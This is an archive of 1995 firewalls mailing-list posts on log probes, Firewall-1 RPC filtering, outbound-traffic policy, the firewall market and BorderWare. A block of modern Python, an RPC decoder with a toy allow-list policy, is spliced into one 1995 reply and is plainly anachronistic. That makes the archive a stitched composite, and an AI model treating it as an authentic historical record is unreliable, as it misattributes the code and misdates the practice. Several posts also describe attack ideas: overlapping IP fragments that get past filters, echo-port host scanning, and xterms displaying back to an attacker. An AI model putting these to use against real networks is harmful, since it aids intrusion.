Christopher William Klaus      Voice: (404)441-2531. Fax: (404)441-2431
Internet Security Systems, Inc.            Computer Security Consulting
2000 Miller Court West, Norcross, GA 30071
========================< http://iss.net/~iss >=========================

From firewalls-owner Fri May 12 15:10:52 1995
Date: Fri, 12 May 1995 12:49:08 +0900
To: Firewalls@GreatCircle.COM
From: danielh@panbio.com (Dan Hillman)
Subject: Sorry about the misrouted mail...
Cc: danielh@panbio.com

On Thursday night, in error, I sent a number of people on the Great Circle
firewalls mailing-list a series of messages that I believed were being
rerouted to a second mail-account that I own. Please accept my sincere
apologies and assurances that it won't happen again.
*Potential security risk*

Warning to all you Eudora (Qualcomm's mail program) admins out there: a new
user attempting to make a nickname may not know that the nickname will be
expanded into all the senders' addresses that happen to be selected in a
mailbox at that time. Sure would be nice if Eudora at least *asked
confirmation* for a new nickname. Maybe I should RTFM. (shudder)

Anyway, sorry again,

-Dan

From firewalls-owner Fri May 12 22:13:29 1995
Message-Id: <199505130500.WAA02206@miles.greatcircle.com>
From: Darren Reed
Subject: Re: A Probe?
To: jpf@mig.com (Jack Flory)
Date: Sat, 13 May 1995 15:01:50 +1000 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <199505110422.WAA16152@mig.com> from "Jack Flory" at May 10, 95 10:22:19 pm

In some mail from Jack Flory, they said:
>
> Forgive me for my lapses... I have not subscribed to the list
> for some time. However, I ran across the following sequence
> in my log files and I thought some of you might have a few
> ideas about the pattern. Does this appear to be an organized
> probe? This is one of the few irregularities that I have not been
> able to trace to routing flaps due to Internet restructuring.
> Please reply directly to keep the S/N ratio low. ThankX.
>
> May 10 20:54:11 gateway screend[4377]: REJECT: UDP
> [204.240.1.23]->[204.132.146.71](2769->7)
> May 10 20:54:11 gateway kernel: REJECT (IN): UDP
> [204.240.1.23]->[204.132.146.17](2715->7) ulen 13 on eth0

Not this one...or maybe...if it was only port 7, then the only reason you'd
do this would be to `ping' a host without pinging it.

Why would you do this ? SATAN pings hosts before doing a udpscan on them; a
program I wrote 2 years ago would do a UDP scan but used port 7 (echo)
instead of ping/ICMP ECHO to estimate RTT.

That didn't look much like an attack, however.

darren

From firewalls-owner Fri May 12 23:13:25 1995
From: Danny Yang
Message-Id: <199505130603.PAA07888@serome.serome.co.kr>
Subject: How does Firewall-1 filter RPC services?
To: firewalls@GreatCircle.COM
Date: Sat, 13 May 1995 15:03:16 +0900 (JST)

Sorry if it had been discussed before.

I'd like to know how Firewall-1 filters RPC services. Does it simply filter
connections to the portmapper (TCP/UDP 111) or can the admin set filtering
rules for individual RPC services?

Thanks in advance.
-danny

From firewalls-owner Sat May 13 02:43:26 1995
From: T.Greenland@uts.EDU.AU
Date: Sat, 13 May 1995 19:16:00 +1000 (EST)
Subject: Re: Requesting "echo"
To: firewalls@greatcircle.com
In-Reply-To: <9505121314.AA29512@wellspring.us.dg.com>

> > >2) How should a firewall respond when it receives a request for one of
> > >these services and they are being denied?
> >
> >   o Log it.
> >   o Notify network administration via E-Mail, pager, etc.
> >   o Take pro-active defense measures such as send its own
> >     nasty ICMP messages (such as ICMP network unreachables and
> >     redirects for net 0 ) back to the source :-)

what do you mean "net 0"? the default route (0.0.0.0)?

can someone clarify this for me please?
Tim Greenland                     T.Greenland@uts.edu.au
Information Technology Division   Phone: +61 2 330 2116
University of Technology, Sydney  Fax:   +61 2 330 1994

From firewalls-owner Sat May 13 08:13:27 1995
Date: Sat, 13 May 1995 09:55:39 -0500 (CDT)
From: Oliver Friedrichs
To: firewalls@greatcircle.com
Subject: Re: How does Firewall-1 filter RPC services?
In-Reply-To: <199505130603.PAA07888@serome.serome.co.kr>

On Sat, 13 May 1995, Danny Yang wrote:

> I'd like to know how Firewall-1 filters RPC services.
> Does it filter simply connection to portmapper(TCP/UDP 111) or
> can admin set filtering rules for individual RPC services?

It looks inside the packet to identify which application it is. It also
communicates with the portmappers on the inside network to obtain the port
numbers.

- Oliver
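To show what "looking inside the packet" involves, an added example that is not Firewall-1 code and makes no claim about how Firewall-1 implements it: a Python decoder for the Sun RPC call header (RFC 1057) that, for portmapper GETPORT requests, extracts which program the client is looking up, plus a toy inbound policy that admits lookups only for programs on an allow list and denies DUMP, which enumerates every registered service. The packets are constructed with a helper below; the program numbers 100000 (portmapper), 100003 (NFS), 100005 (mountd) and 100021 (lock manager) are the standard assignments, and the allow list is an assumption.

```python
import struct

RPC_CALL = 0          # msg_type of a call message
RPC_VERSION = 2
PMAP_PROG = 100000    # the portmapper's own program number
PMAP_PROCS = {0: "NULL", 1: "SET", 2: "UNSET", 3: "GETPORT", 4: "DUMP", 5: "CALLIT"}
# Standard Sun RPC program numbers referred to by the toy policy below
PROGRAM_NAMES = {100000: "portmapper", 100003: "nfs", 100005: "mountd", 100021: "nlockmgr"}
MAX_AUTH_BYTES = 400  # RFC 1057 bound on an opaque_auth body


class RpcDecodeError(ValueError):
    """Raised for payloads that are not a well-formed RPC version 2 call."""


def _u32(buf, off):
    """Read one big-endian XDR unsigned int at off; return (value, new offset)."""
    if off + 4 > len(buf):
        raise RpcDecodeError("truncated RPC message")
    return struct.unpack(">I", buf[off:off + 4])[0], off + 4


def _skip_opaque_auth(buf, off):
    """Skip an opaque_auth (flavor, length, body padded to 4); return (flavor, new offset)."""
    flavor, off = _u32(buf, off)
    length, off = _u32(buf, off)
    if length > MAX_AUTH_BYTES:
        raise RpcDecodeError("oversized auth body")
    padded = (length + 3) & ~3
    if off + padded > len(buf):
        raise RpcDecodeError("truncated auth body")
    return flavor, off + padded


def decode_rpc_call(payload):
    """Decode the RPC call header from a UDP payload. For portmapper GETPORT calls
    also decode the (program, version, protocol) the client is asking about."""
    xid, off = _u32(payload, 0)
    msg_type, off = _u32(payload, off)
    if msg_type != RPC_CALL:
        raise RpcDecodeError("not an RPC call")
    rpcvers, off = _u32(payload, off)
    if rpcvers != RPC_VERSION:
        raise RpcDecodeError(f"unsupported RPC version {rpcvers}")
    prog, off = _u32(payload, off)
    vers, off = _u32(payload, off)
    proc, off = _u32(payload, off)
    cred_flavor, off = _skip_opaque_auth(payload, off)
    _verf_flavor, off = _skip_opaque_auth(payload, off)
    call = {"xid": xid, "prog": prog, "vers": vers, "proc": proc,
            "cred_flavor": cred_flavor, "target_prog": None, "target_vers": None,
            "target_prot": None}
    if prog == PMAP_PROG and PMAP_PROCS.get(proc) == "GETPORT":
        # GETPORT args: prog, vers, prot (6 = TCP, 17 = UDP), port (ignored on a request)
        call["target_prog"], off = _u32(payload, off)
        call["target_vers"], off = _u32(payload, off)
        call["target_prot"], off = _u32(payload, off)
    return call


def policy_decision(call, allowed_programs):
    """Toy rule for inbound packets (an assumption, not any product's logic): permit
    portmapper NULL, permit GETPORT only for programs on the allow list, deny
    DUMP/SET/UNSET/CALLIT, and permit direct RPC calls only to allowed programs."""
    if call["prog"] == PMAP_PROG:
        name = PMAP_PROCS.get(call["proc"])
        if name == "NULL":
            return "allow"
        if name == "GETPORT" and call["target_prog"] in allowed_programs:
            return "allow"
        return "deny"
    return "allow" if call["prog"] in allowed_programs else "deny"


def build_pmap_call(xid, proc, *args):
    """Constructed test helper: encode a portmapper call with AUTH_NULL cred and verf
    (flavor 0, empty body) followed by any number of u32 arguments."""
    header = struct.pack(">IIIIII", xid, RPC_CALL, RPC_VERSION, PMAP_PROG, 2, proc)
    auth = struct.pack(">IIII", 0, 0, 0, 0)
    return header + auth + struct.pack(">" + "I" * len(args), *args)


if __name__ == "__main__":
    allowed = {100000, 100005}  # assumed site policy: mountd lookups yes, NFS/lockd no
    for prog in (100005, 100003):
        call = decode_rpc_call(build_pmap_call(0x1234, 3, prog, 2, 17, 0))
        print(PROGRAM_NAMES[call["target_prog"]], policy_decision(call, allowed))
```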
From firewalls-owner Sat May 13 08:44:46 1995
Date: Sat, 13 May 1995 11:37:24 -0400
Message-Id: <199505131537.AA21167@northshore.ecosoft.com>
To: Christopher Klaus , firewalls@greatcircle.com
From: jr@vc.com (Jonathan Roosevelt)
Subject: Re: Firewall Marketplace

On May 12 Christopher Klaus was heard to utter:
>Anyone have any statistics that indicate the size of the firewall market?
>This may be extrapolated from how many companies are connecting to the
>Internet daily. Are there any statistics on that?
>
>I believe Internic was getting close to 5000 domain name requests over a
>2 week period? but I doubt that even comes close to how many companies
>are actually connecting to the Internet each week.

This is a question with which I have been trying to grapple. I'm happy to
share my thoughts, although I caution you to gurgle them with some salt.

There are roughly 50,000 .com domain names and probably 110,000 total
domain names (how many are in use I don't know -- but I think the latest
statistic on Web server sites is 35,000). At the current growth rate, there
should be 65,000 .com domain names by the end of June.

A recent Yankee Group survey found that 88% of Fortune 1000 businesses with
Internet connections checked "firewall" in response to the following
question: "What security measures have you taken or will you take to
protect your network or transmissions?"
29% answered "internal only," 18% answered "external only," and 41%
answered "both internal and external."

I was figuring an average of 2 firewalls/Fortune 1000 (is this reasonable?),
which at $20K/firewall translates into a $40 million Fortune 1000 firewall
opportunity. I'd be interested in any thoughts on how many Fortune 1000
firewall purchases anyone thinks have been made and in thoughts on what
percent of the market belongs to Fortune 1000 sales.

On the government side, one vendor told me that the Federal Government will
purchase 3,000 firewalls over the next one to two years. At $20K/firewall,
this would be a $60 million opportunity.

I welcome any comments.

Jonathan Roosevelt
Battery Ventures
200 Portland Street
Boston, MA 02114
voice: (617)367-1011
fax: (617)367-1070

From firewalls-owner Sat May 13 09:02:50 1995
Date: Sat, 13 May 1995 08:21:57 -0700
Message-Id: <9505131521.AA13318@ucsdext.ucsd.edu>
To: foxhunter@telalink.net
From: stirling@ucsdext.ucsd.edu (Stirling Goetz)
Subject: Re: Good all encompassing security guide
Cc: firewalls@GreatCircle.COM

Microsoft distributes a "redbook" called:

  Microsoft Windows NT Enterprise Planning Guide: Security

It's mostly about the internals of how the OS handles security in its
various subsystems (i.e. - NetLogon process, NTFS security objects, etc...)
Outside of that, any software you add to your server should come with its own chapter on buttoning it down. The redbook detail on user security helps you plan the various accounts that your internet programs run as. The part number on my 02/94 dated copy is 098-54661.

When your NT server is secure as an Internet server then you get to dig into all the firewalling docs that came with your firewalling product. Currently I haven't found any firewalling software for NT and normal network cards. Microsoft is currently working on one for NT as we speak but I wouldn't hold my breath for the ship date or a flawless "Microsoft Firewall 1.0". The TCP/IP utils in NT are severely lacking in comparison to Unix. There isn't even a dynamic routing function in the OS, no RIP/OSPF/BGP without buying special routing adapters! So don't even bother looking for packet filtering utils. They really are pushing TCP/IP as their protocol of choice for NT LANs/WANs but they expect you to buy external products to have a full solution. Sheesh!

Besides those beefs, I've seen NT serve up SMTP/News/NFS/HTTP/Gopher/FTP/WAIS/PPP/DHCP so it's sneaking behind businesses' homepages everywhere.

>>Date: Wed, 10 May 1995 18:24:19 -0500
>>From: "Jason M. LeBlanc"
>>To: firewalls@GreatCircle.COM
>>Subject: Good all encompassing security guide
>>
>>I know that's a misnomer...
>>I need security info concerning the internet and NT servers, very new to
>>the internet from a server standpoint, so don't beat me too hard.
>>Something like 1. plug the thing in... 2. turn it on... 3. click on make me
>>secure..., anything like that out there? Course not. But still looking...
>>
>>Appreciate any help.
>>Thanks
>>Jason M.
>>LeBlanc
>>foxhunter@telalink.net
>>MIS
>>Last Straw Communications

- Stirling (GenX)
"Life is what happens while you're making other plans" -Unknown

From firewalls-owner Sat May 13 09:13:27 1995
Date: Sat, 13 May 95 11:52:04 -0400
Message-Id: <9505131552.AA05547@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Re: A probe?

darren rites:
>Why would you do this ? SATAN pings hosts before doing a
>udpscan on them; a program I wrote 2 years ago would do a UDP scan
>but used port 7 (echo) instead of ping/ICMP ECHO to estimate RTT.

Problem with ECHO is that not every system supports it. For example 3000 PCs running popular TCP/IP kernels will not respond yet every "full featured" PC package I know of will respond to a PING. As a result while ECHO might be useful in finding particular boxes, I do not think it would be useful in surveying a system to identify *every* box (which I need to do periodically as a cross-check on our records).
Warmly,
Padgett

From firewalls-owner Sat May 13 09:43:27 1995
Message-Id: <199505131619.JAA08910@miles.greatcircle.com>
From: Darren Reed
Subject: Re: IP packet filtering...
To: fitz@wang.com (Tom Fitzgerald)
Date: Sun, 14 May 1995 02:18:09 +1000 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <199505111634.AA23132@fnord.wang.com> from "Tom Fitzgerald" at May 11, 95 12:34:51 pm

In some mail from Tom Fitzgerald, they said:
[...]
> > > If the reassembly algorithm was broken (like RFC 791's), it could be
> > > exploited by cooking up two overlapping fragments: one having a complete
> > > TCP header harmless enough to get through the firewall (for example ACK=1
> > > to get through an "established" filter), and the second fragment beginning
> > > in the middle of the TCP header, overwriting the flags to set ACK=0, to
> > > Bingo.
> >
> > 815 fills holes. A hole is where there is no data.
>
> But that's not enough. If I send the second fragment first, the "hole"
> will only include the first 8 bytes of the TCP header. When the fragment
> with offset=0 arrives later, the flags won't be dropped into the hole, and
> the reassembled packet will have ACK=0.
>
> If fragments arrive out-of-order, the one with the lower fragment-offset
> always has to take precedence, even if it means overwriting part of a
> fragment that arrived earlier.

Hmmm. Actually, if the target host is BSD based, neither of these happens.
It won't even defrag it because the fragments aren't contiguous. Also, it does delete smaller fragments if a larger, all encompassing one is received.

darren

p.s. linux appears safe also.

From firewalls-owner Sat May 13 10:13:32 1995
Date: Sat, 13 May 1995 12:00:35 -0500 (CDT)
From: "B. Joe Smith"
Subject: firewall products
To: firewalls@greatcircle.com

Has anyone compiled a list of all the currently available firewall products?

Joe Smith (Really!)

From firewalls-owner Sat May 13 11:43:29 1995
From: brian@ilinx.ilinx.com (Brian J. Murrell)
To: padgett@tccslr.dnet.mmc.com
Subject: Re[2]: A probe?
Cc: firewalls@GreatCircle.COM
Date: Sat, 13 May 1995 11:36:41 -0700 (PDT)

from the quill of padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) on scroll <9505131552.AA05547@uvs1.orl.mmc.com>
> Problem with ECHO is that not every system supports it. For example
> 3000 PCs running popular TCP/IP kernels will not respond yet every
> "full featured" PC package I know of will respond to a PING.

I think from a "cracking" point of view, this is a good thing. If I were a cracker, I would not be interested in the PCs at this point in time. I don't think PC TCP/IP packages are at the point yet (they're close) where you can take much advantage of them. Most don't even route between interfaces, and how many people are running daemons on them?? Not many I'd guess.

Using ECHO would be a good way to find poorly configured UNIX (and like) boxes. A much better prober than PING for cracking purposes.

b.
--
Brian J. Murrell                        brian@ilinx.com
InterLinx Support Services, Inc.        brian@wimsey.com
North Vancouver, B.C.
604 983 UNIX
Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD

From firewalls-owner Sat May 13 20:34:26 1995
Date: Thu, 11 May 1995 23:18:25 -0400
Message-Id: <199505120318.AA26748@northshore.ecosoft.com>
To: firewalls@greatcircle.com
From: jr@vc.com (Jonathan Roosevelt)
Subject: Firewall gurus

I want to hire a technical consultant who is expert in the firewall area to help me make a decision about investing in a privately held firewall company. I will pay $5,000 for technical evaluations of a few firewall products. I welcome any suggestions.

Jonathan Roosevelt
Battery Ventures
200 Portland Street
Boston, MA 02114
voice: (617)367-1011
fax: (617)367-1070

From firewalls-owner Sun May 14 18:16:48 1995
From: Edward Maillet
Message-Id: <9505150053.AA05125@doc.usmcs.maine.edu>
Subject: Why control outbound traffic?
To: firewalls@greatcircle.com
Date: Sun, 14 May 1995 20:53:28 -0400 (EDT)

Hey All,
I have a simple question. What are the security risks if a site behind a firewall does not restrict outbound connections? Let's say I have an application level firewall. What are the risks of allowing internal users to ftp, WWW, and telnet (or other) to anywhere they like?

Some would argue that information can be sent out to "bad guys" very easily. I agree but I can get information out other ways also so stopping it from going over the net isn't going to stop it from going.

-----
Ed Maillet
maillet@usmcs.maine.edu

From firewalls-owner Sun May 14 19:44:01 1995
Message-Id: <199505150234.MAA09877@citecuf.citec.qld.gov.au>
From: "John Kidston"
To: Edward Maillet
Date: Mon, 15 May 1995 12:36:19 +10:0
Subject: Re: Why control outbound traffic?
Reply-to: j.kidston@citec.qld.gov.au
CC: firewalls@GreatCircle.COM

Edward Maillet wrote:
> Subject: Why control outbound traffic?
> I have a simple question. What are the security risks if a site behind
> a firewall does not restrict outbound connections? Let's say I have an
> application level firewall. What are the risks of allowing internal users
> to ftp, WWW, and telnet (or other) to anywhere they like?
> Some would argue that information can be sent out to "bad guys" very
> easily. I agree but I can get information out other ways also so stopping
> it from going over the net isn't going to stop it from going.

If you monitor outbound traffic, you may even notice who is sending information out to "bad guys"!

Some issues to consider are:
1. The network traffic costs associated with unrestricted access.
2. The risks associated with downloaded information (e.g. viruses).
3. The damage to corporate reputation of your people (deliberately or unwittingly) "hacking" other systems.
4. The corporate implications of being named as the "most frequent visitor" to the hottest pornographic distribution site (or similar).

All of these issues are essentially behaviour related and can be addressed by education. It is a risk analysis question as to whether the cost of education exceeds the likely effects of uncontrolled traffic.

For what it is worth, we currently permit authorised people to telnet, ftp, http anywhere. We don't let them ping, finger, whois, etc.

John Kidston
j.kidston@citec.qld.gov.au
CITEC
voice: +61 7 2222356
fax: +61 7 2277890
317 Edward Street, Brisbane 4000, Australia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"My opinions and CITEC's are not always the same."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From firewalls-owner Sun May 14 20:13:29 1995
From: sgrigg@clark.net
Message-Id: <9505150604.AA0018@sgrigg.clark.net>
Date: Sun, 14 May 95 22:59:20
To: firewalls@greatcircle.com
Reply-To: sgrigg@clark.net
Subject: Pathkey query

I was referred to you by Christopher Klaus. I was recently approached by a company from Seattle, Washington called Paralon. They have a number of products called pathkey. The product is supposed to act in many ways like a firewall, however only in the case of the use of phone connections (modem-to-modem). I was curious as to whether you had heard of them, and what you could tell me about their pathkey products not mentioned during the marketing I received several days ago.

Thanks in advance.
//----------------------------------------------------------------------------
// Steve Grigg
// Advanced Solutions Group
// OPAL Technologies, Inc
// 800-321-3366

From firewalls-owner Sun May 14 22:13:35 1995
Date: Mon, 15 May 1995 00:48:17 -0400 (EDT)
From: Adam Safier
To: Edward Maillet
cc: firewalls@greatcircle.com
Subject: Re: Why control outbound traffic?
In-Reply-To: <9505150053.AA05125@doc.usmcs.maine.edu>

> I have a simple question. What are the security risks if a site behind
> a firewall does not restrict outbound connections? Let's say I have an
> application level firewall. What are the risks of allowing internal users
> to ftp, WWW, and telnet (or other) to anywhere they like?
> Some would argue that information can be sent out to "bad guys" very
> easily. I agree but I can get information out other ways also so stopping
> it from going over the net isn't going to stop it from going.

If your company name or address appears frequently on the Internet you might draw some extra unwanted attention. Will someone visiting playboy.com interfere with your download of government census data for a marketing campaign? You might want to review your company policy and make certain points clear to the users. I would expect that the same policy used for making local phone calls would apply until you can develop an Internet policy.
Assuming your firewall is technically solid, correctly implemented and hides your internal network adequately your risks are probably mostly legal. IMHO, a firewall is only the front gate of your security system. Policy, analysis and planning are major features of a security system.

Adam
"I speak only for myself!" and other disclaimers.

From firewalls-owner Sun May 14 22:26:41 1995
From: Stephen.L.Arnold@Arnold.Com
Date: Sun, 14 May 1995 23:51:54 -0500 (CDT)
Subject: Re: BorderWare (previously "JANUS")
To: Firewalls@GreatCircle.Com
Cc: Stephen.L.Arnold@Arnold.Com
Message-id: <01HQIFMFTRV28WW4XX@Badger.Arnold.Com>
Organization: Arnold Consulting, Inc.

[Originally sent to firewalls-owner@GreatCircle.Com by mistake on 10-May. Sorry...]

> mention of a product previously known as "JANUS" but now called "BorderWare
> FireWall Server." Does anyone have experience or input they care to share on
> this product?
> Thanks in advance!
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> "Printmaker gone digital"      billcurr@cyberspace.com
> http://www.cyberspace.com/billcurr
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

I have no experience with the product, but I'm here in Washington, DC, at the DECUS (Digital Equipment Computer Users Society) National Event, where BorderWare is exhibiting in the trade show.
(If I understand correctly, Digital is now reselling Borderware as its low-priced entry firewall. S.E.A.L. continues as the advanced offering.)

Borderware seems to be a BSD O.S.-based combination packet filter/circuit relay/application relay. The O.S. has been stripped to a minimum set of files. (I didn't pursue how they defined "minimum".)

It is shipped closed, and it's claimed to have a relatively simple ("as a light switch"!) management interface to turn on the supplied, frequently required services (FTP, mail, web, outbound finger, etc.). There is said to be no customization beyond that. (Use S.E.A.L.!)

It comes as software or with a correctly configured Pentium-based PC. If I remember correctly (and there's little chance of that!), pricing is $4000 for some number of internal users (100?), $7000 for more (500?), and $11,000 for unlimited users.

Security tokens are extra. They resell CRYPTOCard challenge-response tokens (like me) and Security Dynamics time-synchronization tokens. For SecurID, the ACE server runs on the box in the first release. In a later release you can use an existing ACE server on your internal net, thus having a single security database.

Please verify the information above, as I've not checked it! Browse http://www.border.com/ for more information.

I hope this will be of some initial help.

Regards, "Steve"

Stephen L. Arnold, Ph.D., President, Arnold Consulting, Inc.
Address 2530 Targhee Street, Madison, Wisconsin 53711-5491 U.S.A.
Telephone +1 608 278 7700
Facsimile +1 608 278 7701
Internet Stephen.L.Arnold@Arnold.Com
Pager (800) 351 8927

From firewalls-owner Sun May 14 23:43:33 1995
Date: Mon, 15 May 95 01:17:21 CDT
From: amolitor@anubis.network.com (Andrew Molitor)
Message-Id: <9505150617.AA17307@anubis.network.com>
To: firewalls@greatcircle.com
Subject: Re: Why control outbound traffic?

I haven't seen anyone mention it, so I will. Certain classes of attacks involve doing various things to get some code running on an internal host which constructs things which either are or which look like outbound connections. Remember the 'get INN or cnews to run arbitrary code' thing? I thought at the time that it would be interesting to post something which resulted in starting an xterm up displaying back to somewhere, then wait for xterms to start popping up. If you don't allow outbound X, this sort of attack will go nowhere, and the duffers will move on.

Just as a general idea, it's not a bad idea to start out with allowing nothing to flow from any segment to any other segment, modelling the internet as just another segment, and then construct your access policy to poke holes in that baseline rule until everyone can get their job done. Then monitor usage to the best of your ability, close holes that are obsolete, open new ones as necessary, etc. This sort of policy by its nature restricts outbound access.
Andrew

From firewalls-owner Mon May 15 01:13:41 1995
From: smlim@super5.hyundai.co.kr (Lonely Martian)
Message-Id: <9505150657.AA11436@super5.hyundai.co.kr>
To: Firewalls@GreatCircle.com
Date: Mon, 15 May 1995 16:57:44 +0900 (GMT+9:00)

subscribe me.

From firewalls-owner Mon May 15 06:13:39 1995
From: "Moubray, Steve"
To: "'firewalls@greatcircle.com'"
Subject: Re: BorderWare (previously "JANUS")
Date: Mon, 15 May 1995 09:46:00 -0500
Message-Id: <95May15.074743cdt.58881@mail.dcc.com>

> mention of a product previously known as "JANUS" but now called "BorderWare
> FireWall Server." Does anyone have experience or input they care to share on
> this product?
> Thanks in advance!
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> "Printmaker gone digital"      billcurr@cyberspace.com
> http://www.cyberspace.com/billcurr
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

I'm currently using the BorderWare firewall and have installed a couple. It is very easy to use, has limited (none really) operation as a host or WS and it can be used as an Internet server offering WWW, FTP, mail, DNS, finger and news. It performs as a proxy server using circuit relay for outbound traffic. Packet filtering can also be used (which makes it nice for some schools). Inbound FTP and Telnet can get through the firewall using one-time passwords provided by the CRYPTO cards. It is configured using pull down menus and the circuit relay required no modification to applications when we installed it here (we use Netscape, news reader, FTP, telnet and mail).

The advantage to something like this is that you plug it in, it works, it requires very little maintenance and it's inexpensive.

More information can be obtained:
www.border.com
www.seachange.com
www.dcc.com

--------------------------------------------------
Steve Moubray
DCC, Inc.
10 Second Street NE
Minneapolis, MN 55413
(612) 378-4469
(612) 378-4401 Fax
smoubray@dcc.com

From firewalls-owner Mon May 15 06:49:22 1995
Date: Mon, 15 May 1995 09:38:03 -0400 (EDT)
From: David Miller
Subject: Re: Why control outbound traffic?
To: Edward Maillet
cc: firewalls@greatcircle.com
In-Reply-To: <9505150053.AA05125@doc.usmcs.maine.edu>

On Sun, 14 May 1995, Edward Maillet wrote:
> Hey All,
> I have a simple question. What are the security risks if a site behind
> a firewall does not restrict outbound connections? Let's say I have an
> application level firewall. What are the risks of allowing internal users
> to ftp, WWW, and telnet (or other) to anywhere they like?
> Some would argue that information can be sent out to "bad guys" very
> easily. I agree but I can get information out other ways also so stopping
> it from going over the net isn't going to stop it from going.

Well, since crackers can get in "other ways" as well, there's really no sense in having a firewall, right? And since no system is 100% secure, there's no real purpose in trying to tighten up security, because there's always a way in, right?

All security provisions - policies, products, people, procedures - have different costs and benefits associated with them. research.att.com probably has very different requirements for restrictions on outgoing data than aol.com. Only you, or someone very familiar with your setup and requirements can really evaluate what you need:)

> -----
> Ed Maillet
> maillet@usmcs.maine.edu
>

---
David
----------------------------------------------------------------------------
It's *amazing* what one can accomplish when one doesn't know what one can't do!
From firewalls-owner Mon May 15 07:13:47 1995
Date: Mon, 15 May 1995 09:52:04 -0400
Message-Id: <199505151352.JAA00403@hatteras.ch.inri.com>
To: Edward Maillet, firewalls@GreatCircle.COM
From: wbunting@inri.com (Bill Bunting)
Subject: Re: Why control outbound traffic?

So to summarize the responses so far...

1. No. There is not a security problem with allowing unrestricted outgoing traffic [from a technical perspective].
2. Any risk is from your users. Can you trust your users? Are your users responsible?
3. Cost. Can you afford to allow your users unrestricted external access?

[Opinions are mine and may not represent the opinions of my employer... etc...]

-Bill.

At 08:53 PM 5/14/95 -0400, Edward Maillet wrote:
>Hey All,
> I have a simple question. What are the security risks if a site behind
>a firewall does not restrict outbound connections? Let's say I have an
>application level firewall. What are the risks of allowing internal users
>to ftp, WWW, and telnet (or other) to anywhere they like?
> Some would argue that information can be sent out to "bad guys" very
>easily. I agree but I can get information out other ways also so stopping
>it from going over the net isn't going to stop it from going.
>-----
>Ed Maillet
>maillet@usmcs.maine.edu
>
>

From firewalls-owner Mon May 15 07:46:37 1995
Date: Mon, 15 May 95 10:29:28 EDT
From: steveg@cseic.saic.com (Stephen Harold Goldstein)
Message-Id: <9505151429.AA22128@cseic.saic.com>
To: firewalls@greatcircle.com
Subject: Firewall Web Page

Could someone please send me the *current* URL for the "Firewall Products" Web page maintained by a kind reader of this list?

Stephen Goldstein
steveg@cseic.saic.com
My first computer: A 24K Atari 800, Rev. A ROMS, November 1980
Disclaimer: That's not what I said.

From firewalls-owner Mon May 15 08:18:04 1995
Date: Mon, 15 May 1995 09:18:35 -0400
From: rajani@fujitsu.ca (Rajani Ramkaran)
Message-Id: <9505151318.AA00735@falcon>
To: firewalls@GreatCircle.COM, ellozy@dfci.harvard.edu
Subject: Re: Comparative evaluations of firewall products?
I recently asked the same question and here is the response I got. Thanks to everyone that responded!

Network World - Mar 6/95
Internet business report - Dec 94
Advanced Systems - Dec 94
Interactive Age - May 8, 95

.. and if you are interested in a comparison of token based solns..
Data Communications - May 95

Rajani
INTERNET: rajani@fujitsu.ca

From firewalls-owner Mon May 15 08:22:37 1995
To: firewalls@greatcircle.com
From: James LaPalme
Subject: Milkyway's Black Hole product
Date: Sun, 14 May 95 14:33:35 EDT

I am searching for information on Milkyway Network's Black Hole product. Information is welcome from end users, the manufacturer or channel partners (if any). The main question would be "Why Blackhole?".

*
James E. LaPalme
Interwork Software
501-150 Laurier Ave.
West Ottawa, Ontario Canada K1P 5J4 Tel: (613) 238-8835 Fax: (613) 238-4453 800: (800) 461-8649 E-Mail: JamesL@Interwork.com * From firewalls-owner Mon May 15 08:44:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07046 for firewalls-outgoing; Mon, 15 May 1995 07:28:03 -0700 Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07041 for ; Mon, 15 May 1995 07:27:56 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA23129; Mon, 15 May 95 10:29:54 EDT Date: Mon, 15 May 1995 10:29:53 -0400 (EDT) From: Scott Barman To: Stephen.L.Arnold@Arnold.Com Cc: Firewalls@GreatCircle.Com Subject: Re: BorderWare (previously "JANUS") In-Reply-To: <01HQIFMFTRV28WW4XX@Badger.Arnold.Com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 14 May 1995 Stephen.L.Arnold@Arnold.Com wrote: [Post about BorderWare deleted. I am not a sales droid for them, just someone who is reviewing different products for a client and BorderWare is one of them--in fact, it's on my "A" list] > Borderware seems to be a BSD O.S.-based combination packet filter/ > circuit relay/application relay. The O.S. has been stripped to a > minimum set of files. (I didn't pursue how they defined "minimum".) It's a stripped down version of BSD/OS from BSDI. I was told by their sales droid that it is stripped down as far as they need it to be and that nothing "extraneous" is left. > It is shipped closed, and it's claimed to have a relatively simple ("as > a light switch"!) management interface to turn the supplied, frequently > required services (FTP, mail, web, outbound finger, etc.). There is > said to be no customization beyond that. (Use S.E.A.L.!) BorderWare, according to my information, can support all internet-based services using a "simple" menu system. The system does not run X for some very obvious reasons. 
